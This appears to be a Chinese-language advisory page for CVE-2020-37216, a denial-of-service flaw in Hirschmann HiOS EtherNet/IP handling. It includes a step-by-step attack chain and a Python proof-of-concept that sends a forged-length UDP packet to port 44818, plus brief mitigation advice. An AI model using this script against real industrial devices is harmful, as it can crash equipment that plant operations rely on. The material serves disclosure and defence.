CVE-2020-37216 CVSS 7.5 高危

CVE-2020-37216 Hirschmann HiOS 拒绝服务漏洞

披露日期: 2026-04-03

来源: [email protected]

漏洞信息

漏洞编号

CVE-2020-37216

漏洞类型

拒绝服务

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Hirschmann HiOS

漏洞概述

Hirschmann HiOS设备在08.1.00和07.1.01之前的版本中存在一个高危的拒绝服务漏洞。该漏洞的根本原因在于EtherNet/IP协议栈未能正确处理数据包长度字段。未经身份验证的远程攻击者可以通过网络发送带有伪造长度值的特制UDP EtherNet/IP数据包，触发设备处理逻辑错误，导致目标设备崩溃、挂起或完全瘫痪，严重影响系统的可用性。

技术细节

该漏洞是Hirschmann HiOS设备中EtherNet/IP协议栈的一个典型输入验证缺陷。EtherNet/IP是一种工业以太网协议，通常运行在UDP端口44818上。在解析UDP数据包时，设备软件信任数据包头中声明的长度字段，而没有验证该长度是否与实际接收到的数据包大小相匹配。攻击者可以构造一个恶意数据包，其中Length字段的值被设置为大于实际UDP载荷的大小。当设备尝试根据这个伪造的长度值读取数据或进行内存操作时，由于缓冲区边界检查缺失，会导致内存破坏。这将触发异常，使设备进程崩溃，从而造成拒绝服务。

攻击链分析

STEP 1

侦察

扫描工控网络，识别开放UDP 44818端口的Hirschmann HiOS设备。

STEP 2

武器化

构造特制的UDP数据包，将EtherNet/IP头部的Length字段设置为大于实际载荷的数值（如0xFFFF）。

STEP 3

投递

通过网络向目标设备的44818端口发送该恶意数据包。

STEP 4

利用

目标设备解析数据包时，未能校验长度字段的有效性，尝试读取超出缓冲区范围的数据。

STEP 5

影响

设备处理逻辑崩溃或陷入死循环，导致设备重启或失去响应，造成服务中断。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import socket
import struct

# Target configuration
TARGET_IP = "192.168.1.100"
TARGET_PORT = 44818  # Default EtherNet/IP port

def create_malicious_packet():
    # EtherNet/IP Header structure (simplified)
    # Command: 0x0063 (SendRRData)
    # Length: Malicious value (e.g., 0xFFFF) larger than actual size
    command = struct.pack('>H', 0x0063)
    length = struct.pack('>H', 0xFFFF) # Malicious length
    session_handle = struct.pack('>I', 0)
    status = struct.pack('>I', 0)
    sender_context = struct.pack('>Q', 0)
    options = struct.pack('>I', 0)
    
    enip_header = command + length + session_handle + status + sender_context + options
    return enip_header

try:
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    payload = create_malicious_packet()
    sock.sendto(payload, (TARGET_IP, TARGET_PORT))
    print(f"Packet sent to {TARGET_IP}:{TARGET_PORT}")
    sock.close()
except Exception as e:
    print(f"Error: {e}")

影响范围

Hirschmann HiOS < 08.1.00

Hirschmann HiOS < 07.1.01

防御指南

临时缓解措施

如果无法立即升级固件，建议在网络边界部署访问控制列表（ACL），严格限制对设备UDP 44818端口的访问来源。同时，应加强对设备运行状态的监控，一旦发现设备异常重启或宕机，应及时排查网络流量中是否存在异常的EtherNet/IP数据包。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表